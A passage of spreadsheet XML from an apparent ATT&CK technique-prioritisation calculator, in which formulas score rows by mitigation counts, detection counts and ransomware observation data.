        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L408">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M408" s="25">
        <v>0</v>
      </c>
      <c r="N408" s="51">
        <v>0</v>
      </c>
      <c r="O408" s="51">
        <v>2</v>
      </c>
      <c r="P408" s="51">
        <v>7</v>
      </c>
      <c r="Q408" s="51">
        <v>3</v>
      </c>
      <c r="R408" s="51"/>
      <c r="S408" s="51">
        <v>0</v>
      </c>
      <c r="T408" s="51"/>
      <c r="U408" s="51">
        <v>0</v>
      </c>
      <c r="V408" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>5.7142857142857134E-2</v>
      </c>
      <c r="W408">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X408">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y408">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z408">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>12</v>
      </c>
      <c r="AA408">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.12</v>
      </c>
      <c r="AB408">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.12</v>
      </c>
      <c r="AC408" s="29" t="s">
        <v>1571</v>
      </c>
      <c r="AD408" s="25" t="str" cm="1">
        <f t="array" ref="AD408">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC408)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE408" s="25">
        <f>IF(AD408="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF408" s="25" t="str" cm="1">
        <f t="array" ref="AF408">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC408)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG408" s="25">
        <f>IF(AF408="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH408" s="25" t="str" cm="1">
        <f t="array" ref="AH408">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC408)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI408" s="25">
        <f>IF(AH408="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ408" s="25" t="str" cm="1">
        <f t="array" ref="AJ408">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC408)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK408" s="25">
        <f>IF(AJ408="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL408" s="25" t="str" cm="1">
        <f t="array" ref="AL408">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC408)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM408" s="25">
        <f>IF(AL408="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN408" s="60">
        <v>0</v>
      </c>
      <c r="AO408" s="51">
        <v>0</v>
      </c>
      <c r="AP408" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.4249999999999997E-2</v>
      </c>
      <c r="AQ408" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.7499999999999994E-2</v>
      </c>
      <c r="AR408" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.7499999999999994E-2</v>
      </c>
      <c r="AS408" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT408" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU40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09" spans="1:47" ht="32.1">
      <c r="A409" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.18693333333333334</v>
      </c>
      <c r="B409" s="25">
        <f>SUM(H409,M409,V409)*(1+SUM(AE409,AG409,AI409,AK409,AM409))</f>
        <v>0.20266666666666669</v>
      </c>
      <c r="C409" s="25" t="s">
        <v>1572</v>
      </c>
      <c r="D409" s="25" t="s">
        <v>175</v>
      </c>
      <c r="E409" s="25" t="s">
        <v>1573</v>
      </c>
      <c r="F409" s="51">
        <v>1</v>
      </c>
      <c r="G409" s="51">
        <v>1</v>
      </c>
      <c r="H409" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I409">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J409">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K409">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L409">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M409" s="25">
        <v>0</v>
      </c>
      <c r="N409" s="51">
        <v>0</v>
      </c>
      <c r="O409" s="51">
        <v>6</v>
      </c>
      <c r="P409" s="51">
        <v>3</v>
      </c>
      <c r="Q409" s="51">
        <v>2</v>
      </c>
      <c r="R409" s="51"/>
      <c r="S409" s="51">
        <v>0</v>
      </c>
      <c r="T409" s="51"/>
      <c r="U409" s="51">
        <v>0</v>
      </c>
      <c r="V409" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>5.2380952380952375E-2</v>
      </c>
      <c r="W409">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X409">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y409">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z409">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>11</v>
      </c>
      <c r="AA409">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.11</v>
      </c>
      <c r="AB409">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.11</v>
      </c>
      <c r="AC409" s="29" t="s">
        <v>1574</v>
      </c>
      <c r="AD409" s="25" t="str" cm="1">
        <f t="array" ref="AD409">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC409)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE409" s="25">
        <f>IF(AD409="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF409" s="25" t="str" cm="1">
        <f t="array" ref="AF409">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC409)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG409" s="25">
        <f>IF(AF409="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH409" s="25" t="str" cm="1">
        <f t="array" ref="AH409">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC409)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI409" s="25">
        <f>IF(AH409="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ409" s="25" t="str" cm="1">
        <f t="array" ref="AJ409">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC409)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK409" s="25">
        <f>IF(AJ409="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL409" s="25" t="str" cm="1">
        <f t="array" ref="AL409">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC409)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM409" s="25">
        <f>IF(AL409="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN409" s="52">
        <v>5</v>
      </c>
      <c r="AO409" s="51">
        <v>1</v>
      </c>
      <c r="AP409" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.18693333333333334</v>
      </c>
      <c r="AQ409" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.7555555555555563E-2</v>
      </c>
      <c r="AR409" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.7555555555555563E-2</v>
      </c>
      <c r="AS409" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT409" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU40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10" spans="1:47" ht="48">
      <c r="A410" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.9950476190476192E-2</v>
      </c>
      <c r="B410" s="25">
        <f>SUM(H410,M410,V410)*(1+SUM(AE410,AG410,AI410,AK410,AM410))</f>
        <v>0.23283809523809526</v>
      </c>
      <c r="C410" s="25" t="s">
        <v>1575</v>
      </c>
      <c r="D410" s="25" t="s">
        <v>1576</v>
      </c>
      <c r="E410" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F410" s="51">
        <v>1</v>
      </c>
      <c r="G410" s="51">
        <v>1</v>
      </c>
      <c r="H410" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I410">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J410">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K410">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L410">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M410" s="25">
        <v>0</v>
      </c>
      <c r="N410" s="51">
        <v>1</v>
      </c>
      <c r="O410" s="51">
        <v>4</v>
      </c>
      <c r="P410" s="51">
        <v>1</v>
      </c>
      <c r="Q410" s="51">
        <v>5</v>
      </c>
      <c r="R410" s="51"/>
      <c r="S410" s="51">
        <v>0</v>
      </c>
      <c r="T410" s="51"/>
      <c r="U410" s="51">
        <v>0</v>
      </c>
      <c r="V410" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>5.2380952380952375E-2</v>
      </c>
      <c r="W410">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X410">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y410">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z410">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>11</v>
      </c>
      <c r="AA410">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.11</v>
      </c>
      <c r="AB410">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.11</v>
      </c>
      <c r="AC410" s="29" t="s">
        <v>1577</v>
      </c>
      <c r="AD410" s="25" t="str" cm="1">
        <f t="array" ref="AD410">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC410)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE410" s="25">
        <f>IF(AD410="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF410" s="25" t="str" cm="1">
        <f t="array" ref="AF410">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC410)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG410" s="25">
        <f>IF(AF410="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH410" s="25" t="str" cm="1">
        <f t="array" ref="AH410">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC410)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI410" s="25">
        <f>IF(AH410="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ410" s="25" t="str" cm="1">
        <f t="array" ref="AJ410">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC410)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK410" s="25">
        <f>IF(AJ410="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL410" s="25" t="str" cm="1">
        <f t="array" ref="AL410">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC410)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM410" s="25">
        <f>IF(AL410="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN410" s="59">
        <v>2</v>
      </c>
      <c r="AO410" s="51">
        <v>1</v>
      </c>
      <c r="AP410" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.9950476190476192E-2</v>
      </c>
      <c r="AQ410" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.7612698412698425E-2</v>
      </c>
      <c r="AR410" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.7612698412698425E-2</v>
      </c>
      <c r="AS410" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT410" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU41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11" spans="1:47" ht="32.1">
      <c r="A411" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.9633333333333336E-2</v>
      </c>
      <c r="B411" s="25">
        <f>SUM(H411,M411,V411)*(1+SUM(AE411,AG411,AI411,AK411,AM411))</f>
        <v>0.19633333333333336</v>
      </c>
      <c r="C411" s="25" t="s">
        <v>1578</v>
      </c>
      <c r="D411" s="25" t="s">
        <v>208</v>
      </c>
      <c r="E411" s="25" t="s">
        <v>1579</v>
      </c>
      <c r="F411" s="51">
        <v>1</v>
      </c>
      <c r="G411" s="51">
        <v>1</v>
      </c>
      <c r="H411" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I411">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J411">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K411">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L411">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M411" s="25">
        <v>0</v>
      </c>
      <c r="N411" s="51">
        <v>0</v>
      </c>
      <c r="O411" s="51">
        <v>1</v>
      </c>
      <c r="P411" s="51">
        <v>1</v>
      </c>
      <c r="Q411" s="51">
        <v>0</v>
      </c>
      <c r="R411" s="51">
        <v>2.6</v>
      </c>
      <c r="S411" s="51">
        <v>1</v>
      </c>
      <c r="T411" s="52" t="s">
        <v>1580</v>
      </c>
      <c r="U411" s="51">
        <v>3</v>
      </c>
      <c r="V411" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047623E-2</v>
      </c>
      <c r="W411">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>4</v>
      </c>
      <c r="X411">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>7.2727272727272724E-2</v>
      </c>
      <c r="Y411">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>7.2727272727272724E-2</v>
      </c>
      <c r="Z411">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA411">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB411">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC411" s="29" t="s">
        <v>1060</v>
      </c>
      <c r="AD411" s="25" t="str" cm="1">
        <f t="array" ref="AD411">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC411)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE411" s="25">
        <f>IF(AD411="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF411" s="25" t="str" cm="1">
        <f t="array" ref="AF411">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC411)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG411" s="25">
        <f>IF(AF411="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH411" s="25" t="str" cm="1">
        <f t="array" ref="AH411">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC411)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI411" s="25">
        <f>IF(AH411="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ411" s="25" t="str" cm="1">
        <f t="array" ref="AJ411">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC411)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK411" s="25">
        <f>IF(AJ411="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL411" s="25" t="str" cm="1">
        <f t="array" ref="AL411">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC411)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM411" s="25">
        <f>IF(AL411="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN411" s="60">
        <v>0</v>
      </c>
      <c r="AO411" s="51">
        <v>0</v>
      </c>
      <c r="AP411" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.9633333333333336E-2</v>
      </c>
      <c r="AQ411" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.5444444444444458E-2</v>
      </c>
      <c r="AR411" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.5444444444444458E-2</v>
      </c>
      <c r="AS411" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT411" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU41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12" spans="1:47" ht="48">
      <c r="A412" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.6300000000000002E-2</v>
      </c>
      <c r="B412" s="25">
        <f>SUM(H412,M412,V412)*(1+SUM(AE412,AG412,AI412,AK412,AM412))</f>
        <v>0.19633333333333336</v>
      </c>
      <c r="C412" s="25" t="s">
        <v>1581</v>
      </c>
      <c r="D412" s="25" t="s">
        <v>365</v>
      </c>
      <c r="E412" s="25" t="s">
        <v>1582</v>
      </c>
      <c r="F412" s="51">
        <v>1</v>
      </c>
      <c r="G412" s="51">
        <v>1</v>
      </c>
      <c r="H412" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I412">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J412">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K412">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L412">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M412" s="25">
        <v>0</v>
      </c>
      <c r="N412" s="51">
        <v>2</v>
      </c>
      <c r="O412" s="51">
        <v>2</v>
      </c>
      <c r="P412" s="51">
        <v>0</v>
      </c>
      <c r="Q412" s="51">
        <v>0</v>
      </c>
      <c r="R412" s="52">
        <v>4.0999999999999996</v>
      </c>
      <c r="S412" s="51">
        <v>1</v>
      </c>
      <c r="T412" s="51" t="s">
        <v>1583</v>
      </c>
      <c r="U412" s="51">
        <v>2</v>
      </c>
      <c r="V412" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="W412">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>3</v>
      </c>
      <c r="X412">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>5.4545454545454543E-2</v>
      </c>
      <c r="Y412">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>5.4545454545454543E-2</v>
      </c>
      <c r="Z412">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA412">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB412">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
